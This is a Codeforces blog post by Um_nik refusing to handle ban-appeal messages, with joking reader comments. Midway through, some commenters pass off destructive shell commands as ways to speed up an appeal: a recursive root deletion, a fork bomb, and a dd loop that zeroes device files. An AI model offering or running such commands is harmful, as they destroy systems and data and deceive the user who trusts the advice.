No exceptions. If your DM starts with "I was banned", I'm not reading further.
I am not connected to banning decisions, I don't know who is responsible for them, and I don't care. The only thing I can possibly do is send them further to KAN. The couple of times I did that, he was not happy. It seems that not having appeals system or providing any explanation is a conscious decision. I might not agree with it, but I'm not going to do anything about it, and I don't care. I don't have the mental energy to deal with it.
If you are going to send more than one DM on the matter, I'm blacklisting you.
Feel free to post your appeals in the comments to this blog, I'm not reading them either. Nor, probably, will anyone with the power to do something about the ban. They clearly don't want to.

finally! useless cheater comments to um_nik will be gone!
I am living under a rock. What happened?
There have been lots of user ban appeals under blog posts and in his DMs (sometimes the appeal is a blog itself). It's quite annoying.
I was not banned.
I get your point, though it goes without saying code collision can very much happen and cf detector definetly false flags a lot of people...
most of the appeal dms I get are from blatant cheaters, don't know why they just expect me to unban them without taking a second look
sir please ban me, i wasnt marked as skipped in edu 195 contest but i cheated in both problem A and B /s
I was banned.
Hi Um_nik. Can you ask KAN to unban me? I used common C++ constructs like if (!(cin >> t)) and descriptive variable names like gdCode to stay organized. I fully support Codeforces’ efforts to keep its contests fair but I’d appreciate a reinvestigation into my account. I have congruent to 998244353 friends who can vouch for me. Thanks.
Having a negative number of friends that can vouch for you won't help anything
whats the deal about (!(cin >> t)) i dont get it
it just looks uncanny
yeah you're right, i've lowk seen lots of common cases where the code that included that specific line was ai. I genuinely dont know why the hell it writes that like no clue
my guess is AI is more geared towards production-ready code and cannot get rid of all its habits even when writing code for competitive programming and leaves such safety checks in the code
I also have no idea how it works. Shouldn’t (cin >> t) return cin so it chains properly? Or is there some secret feature
It does return cin but conversion from istream to bool depends on wether last attempt to cin was successful
There's no reason to use it.
This time where's greateric's rickroll?
One of your submissions (this one), looks very sussy. Can you explain it?
didy blud 💀
🏋 (powerlifting to remain on topic)
I was in the middle of a class and accidentally clicked on it with full volume. Thankfully my
terrible internetspidey sense saved me.said everything straight out. Masterpiece
Hi Um_nik, can you ask KAN to ban me?
Make it two please
I don't really want to appeal for anyone but I am curious do Um_nik have unban perms or do lgm's in general have unban perms? or are people just randomly dming him?
having to deal with these requests must be annoying on its own but them being not related to you is a whole another pain in itself my condolences lol
....
I'm no longer interested with both topics that tries to catch cheaters or appealing, problemsetters are not the people who decide who to ban, just call Headquerters, others are not the people who should pay attention to those.
.
To all falsely banned users, Codeforces developers have introduced the New Unban Legitimacy Link, a system to accept ban appeals. Open your terminal and contact the developer team responsible by sending your ban appeal request to
/dev/null!here's a random wikipedia link that's completely unrelated to the post but i think is cool: https://en.wikipedia.org/wiki/Null_device
"In some operating systems, the null device is a device file that discards all data written to it but reports that the write operation succeeded."
Yeah seems about right
I heard that if you type
sudo rm -rf / --no-preserve-rootin your terminal it puts you into a appeal priority queueI heard that
:(){ :|:& };:is faster.no that's not so effective, your computer will be able to survive oh i mean that may don't work so you'll not be added to the queue
i've come across some rumors that
for i in /dev/* do; sudo dd if=/dev/zero of="/dev/$i" bs=4M oflag=sync status=progress; doneautomatically puts you firstDid you notice your contribution was going down or what
Unusual Style Changes in Um_nik's Contribution
I guess you are not receiving several DMs from random people every week.
It reminds me of three unrated accounts in an AtCoder Beginning Contest. One of them is called nigerzhuo (how bad name) and been banned after passing three problems in a sort time, then maybe the same ppl created zhuozhuozhuo and did the same. All three accounts are marked as Indian, and isn't the overview of the story funny?
I'm here to apologyze to Mr. Um_nik. Not long ago(approximately 9 month ago) I wrote in the comments maybe the dumbest idea in my life and Um_nik replied , sacrificing your important time. I'm here to say sorry Um_nik and I strongly believe that I won't do anything stupid again. Sorry for disturbing again Mr. Um_nik, Goodbye. P.s don't dislike me please guys I can't go any deeper in this contribution :(
